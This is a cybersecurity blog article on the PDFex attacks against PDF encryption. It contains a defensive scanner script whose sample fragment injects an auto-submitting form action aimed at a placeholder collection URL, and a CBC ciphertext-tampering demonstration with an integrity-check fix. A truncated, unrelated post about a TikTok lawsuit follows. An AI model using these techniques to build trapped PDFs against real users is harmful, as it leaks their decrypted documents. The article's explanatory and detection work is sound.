Researchers Find New Hack To Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of a password-protected or encrypted PDF file without knowing the password?

Well, that's now possible, thanks to a set of attack techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.

PDFex, as the new techniques are called, comprises two classes of attacks that take advantage of weaknesses in the standard encryption built into the PDF (Portable Document Format). PDFex does not let an attacker learn or remove the password of an encrypted PDF file. Instead, it lets an attacker remotely exfiltrate the content once a legitimate user opens that PDF file.

In other words, a PDFex attack lets an attacker modify a password-protected or encrypted PDF file, without knowing the password, in such a way that when someone with the correct password opens it, the file automatically sends a copy of the decrypted content to a remote attacker.

PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.

It is important to note that the attack targets the encryption defined by the PDF (Portable Document Format) standard itself, not a flaw in any one application.

PDFex Attacks Exploit Two PDF Vulnerabilities

The two weaknesses that PDFex attacks exploit are:

1. Partial Encryption

By design, the PDF specification supports partial encryption: only strings and streams are encrypted, while the objects that define the file's structure remain unencrypted.

This mixing of plaintext and ciphertext within one file gives an attacker an easy way to manipulate the file structure and inject a malicious payload into it.

2. Ciphertext Malleability

PDF encryption uses the CBC (Cipher Block Chaining) mode with no integrity check, which attackers can use to craft self-exfiltrating ciphertext parts. In CBC, each decrypted block is XORed with the previous ciphertext block, so a change to one ciphertext block produces an exactly predictable change in the next plaintext block, and nothing in the decryption process notices the modification.

PDFex Attack Classes: Direct Exfiltration and CBC Gadgets

Now, let's look at the two classes of PDFex attacks.

Class A: Direct Exfiltration

This class takes advantage of the partial encryption feature of a password-protected PDF file (that is, the file is not encrypted in its entirety; some parts are left unencrypted).

Thus, an attacker can modify the unencrypted fields, add unencrypted objects and create a trapped PDF file that, once decrypted and opened, attempts to send the file's content to the attacker.

This can be achieved in three ways:

1. By modifying a PDF file's unencrypted data to add a PDF form that automatically submits the PDF's content to an attacker's server when the victim decrypts and opens the encrypted PDF file.

2. By modifying a PDF file's unencrypted data to add a hyperlink that is triggered automatically when the victim decrypts and opens the encrypted PDF file.

3. By modifying a PDF file's unencrypted data to add JavaScript code that runs automatically when the victim decrypts and opens the encrypted PDF file.

Of the three, the first is the easiest to perform and the most effective, as it requires no user interaction. The second requires opening an external browser, which the user can prevent. The third is the least reliable, because many PDF applications limit JavaScript (JS) support due to the security risks of letting PDF files run JS code in the background.

As shown in the researchers' figure, the object containing the link (in blue) used for form submission is not encrypted and is completely under the attacker's control.
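The partial-encryption weakness described above can be turned into a defensive check. The Python script below is an added example written for this post, not code from the PDFex researchers: it walks the plaintext object skeleton of a PDF, finds action dictionaries of the kinds listed above (/SubmitForm, /URI, /JavaScript, /Launch), and flags any that sit in an encrypted file yet carry a readable literal string, since in a correctly encrypted document every string should be ciphertext. The two PDF fragments are constructed for the example and are not valid files (they have no cross-reference table), the URL is a placeholder, and the regular expressions are a heuristic that does not handle object streams, escaped strings or hex-encoded strings.

```python
import re

# PDF action types that make a viewer contact the network or run code. Names
# and dictionary structure are never encrypted by standard PDF encryption;
# only strings and streams are, which is the partial-encryption weakness.
TRIGGER_NAMES = (b"/SubmitForm", b"/URI", b"/JavaScript", b"/Launch")

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
LITERAL_RE = re.compile(rb"\(([^()\\]*)\)")                   # simple literal strings only
OPEN_ACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+0\s+R")  # document-open trigger

# Constructed, minimal PDF-like fragments for the example (no xref table, so
# not valid files). Object 4 carries a submit-form action that object 1 fires
# on open; the trailer's /Encrypt entry marks the document as encrypted.
SUSPICIOUS = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm 6 0 R /OpenAction 4 0 R >> endobj\n"
    b"3 0 obj << /Length 8 >> stream\n\x8a\x13\x5f\x02\xe1\x77\x90\x41\nendstream endobj\n"
    # A readable URL inside an encrypted file: this string was injected in plaintext.
    b"4 0 obj << /Type /Action /S /SubmitForm /F (http://example.invalid/collect) >> endobj\n"
    b"5 0 obj << /Filter /Standard /V 5 /R 6 /Length 256 >> endobj\n"
    b"trailer << /Root 1 0 R /Encrypt 5 0 R /ID [<0102> <0304>] >>\n"
)
# Same skeleton, but the action's string is ciphertext (hex-encoded), as it should be.
CLEAN = SUSPICIOUS.replace(b"(http://example.invalid/collect)", b"<9C3A7F1B04E2D8A6>")


def scan(pdf: bytes) -> list:
    """Return one finding per object that carries a trigger action."""
    encrypted = b"/Encrypt" in pdf                      # the trailer is always plaintext
    auto = {int(n) for n in OPEN_ACTION_RE.findall(pdf)}
    findings = []
    for num, body in OBJ_RE.findall(pdf):
        triggers = [n.decode() for n in TRIGGER_NAMES if n in body]
        if not triggers:
            continue
        # In an encrypted file every string should be ciphertext; a readable
        # ASCII literal next to an action is the hallmark of plaintext injection.
        readable = [s.decode() for s in LITERAL_RE.findall(body)
                    if s and all(32 <= c < 127 for c in s)]
        if encrypted and readable:
            severity = "high"
        elif int(num) in auto:
            severity = "medium"
        else:
            severity = "info"
        findings.append({
            "obj": int(num),
            "triggers": triggers,
            "readable_strings": readable,
            "auto_triggered": int(num) in auto,
            "encrypted_file": encrypted,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("clean", CLEAN)):
        for f in scan(sample):
            print(label, f)
```

A "high" finding means an action object in an encrypted document points at a readable, and therefore unencrypted, target: exactly the mixed plaintext-and-ciphertext structure the article describes. The "medium" tier only says that an action fires on open, which legitimate forms can do too, so it is a prompt to inspect the file rather than a verdict.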

Class B: CBC Gadgets

With CBC gadgets, the ciphertext itself is modified so that it exfiltrates itself once decrypted.

Not all PDF viewers support partially encrypted documents, but many of them also lack file integrity protection, which allows attackers to tamper directly with the encrypted data of an object and thereby control what it decrypts to.

The attack scenario for CBC gadgets is almost the same as for Direct Exfiltration; the only difference is that here the attacker modifies the existing encrypted content, or creates new content from CBC gadgets, to add actions that define how the data is exfiltrated once a user opens the encrypted PDF file.

In addition, if a PDF file contains compressed streams to reduce its size, attackers need to use half-open object streams to steal the data.

An attacker can use CBC gadgets to modify the encrypted content, creating trapped PDF files that submit their own content to remote servers via PDF forms or URLs.
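The ciphertext malleability weakness described under point 2 above and the CBC gadget class just explained rest on the same property of CBC mode, and it can be demonstrated in a few dozen lines. The Python below is an added example for this post, not the researchers' code: it implements CBC over a small Feistel block cipher (a stand-in for AES, built from the standard library so the example runs offline; the malleability is a property of the chaining mode, not of the cipher), shows that XORing a value into one ciphertext block changes the next plaintext block by exactly that value while decryption reports no error, and then shows that the same modification is rejected once an HMAC tag over the ciphertext is checked before decryption. The keys, IV and plaintext blocks are constructed for the demonstration.

```python
import hashlib
import hmac

BLOCK = 16  # block size in bytes, as for AES-CBC in PDF encryption


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Keyed round function for the Feistel stand-in: HMAC-SHA256, truncated.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # 4-round Feistel network (constructed stand-in for AES) using only the
    # standard library. Encrypt: (l, r) -> (r, l XOR F_i(r)) for each round.
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    # Run the rounds backwards: (l', r') -> (r' XOR F_i(l'), l').
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    assert len(plaintext) % BLOCK == 0, "example omits padding"
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # Plain CBC as PDF uses it: P[i] = D(C[i]) XOR C[i-1]. Nothing here can
    # notice that a ciphertext block was modified.
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def seal(key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Encrypt-then-MAC: the tag covers IV and ciphertext, so any change is detected.
    ct = cbc_encrypt(key, iv, plaintext)
    return ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()


def open_sealed(key: bytes, mac_key: bytes, iv: bytes, sealed: bytes) -> bytes:
    ct, tag = sealed[:-32], sealed[-32:]
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("ciphertext integrity check failed")
    return cbc_decrypt(key, iv, ct)


def demo() -> dict:
    key = hashlib.sha256(b"constructed demo key").digest()
    mac_key = hashlib.sha256(b"constructed demo mac key").digest()
    iv = bytes(range(BLOCK))
    plaintext = b"first block....." b"second block...." b"third block....."
    ct = cbc_encrypt(key, iv, plaintext)

    # XOR 0x20 into the first six bytes of ciphertext block 0. CBC feeds block 0
    # into the XOR that recovers plaintext block 1, so "second" becomes "SECOND"
    # there, while plaintext block 0 itself turns into garbage.
    delta = bytes([0x20] * 6) + bytes(BLOCK - 6)
    modified = _xor(ct[:BLOCK], delta) + ct[BLOCK:]
    pt = cbc_decrypt(key, iv, modified)  # decrypts without any error

    # The same modification against a MAC-protected ciphertext is rejected.
    sealed = seal(key, mac_key, iv, plaintext)
    tampered = _xor(sealed[:BLOCK], delta) + sealed[BLOCK:]
    try:
        open_sealed(key, mac_key, iv, tampered)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "block0_intact": pt[:BLOCK] == plaintext[:BLOCK],             # False
        "block1": pt[BLOCK:2 * BLOCK],                                  # b"SECOND block...."
        "block2_intact": pt[2 * BLOCK:] == plaintext[2 * BLOCK:],       # True
        "mac_rejected": rejected,                                       # True
    }


if __name__ == "__main__":
    print(demo())
```

The garbled block 0 is what the researchers' "CBC gadget" work has to plan around: a modification costs one block of unreadable output, and the injected change in the following block is only useful when the attacker knows what that block decrypted to before. The integrity tag is the missing piece in the PDF standard; with it, the tampered file would be refused before any action inside it could run.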

All 27 of the widely used desktop and web PDF viewers tested are vulnerable to at least one of these attacks.

All of these attacks require the attacker to be in a position to modify the encrypted PDF file, for example by intercepting the user's network traffic or having physical access to the storage system.

PDFex exposes a major weakness in the PDF standard, and it must be fixed in future PDF specifications.

For more details on the PDFex attacks, see the website released by the researchers and their research paper, "Practical Decryption exFiltration: Breaking PDF Encryption".

I hope you find useful information in this article. If you have any questions, please mention them in the comments section and I will get back to you. Stay tuned to my blog to learn interesting things related to cybersecurity and hacking.


The popular Android and iOS short-videos creating app, TikTok hit with a lawsuit claims that the app illegally and secretly transfers app's users' private sensitive data and Personally Identifiable Information (PII) to Chinese servers. TikTok which is a 15-second short-video creating app especially popular among the younger generation and also downloaded over 1.3 Billion times worldwide . TikTok remains top in the most downloaded app list for months on the Apple App Store and Google Play Store.  According to the lawsuit, Tiktok shared the user's created videos which include private acts and closeups of user's faces (biometric data) before the videos are saved on the app. TikTok provides many options includes the next button, close button, and button for effects to its users while recording the video. Here, the next button takes users to the screen that shows these two options : "post" and "save".  After clicking on the "next" button, Tik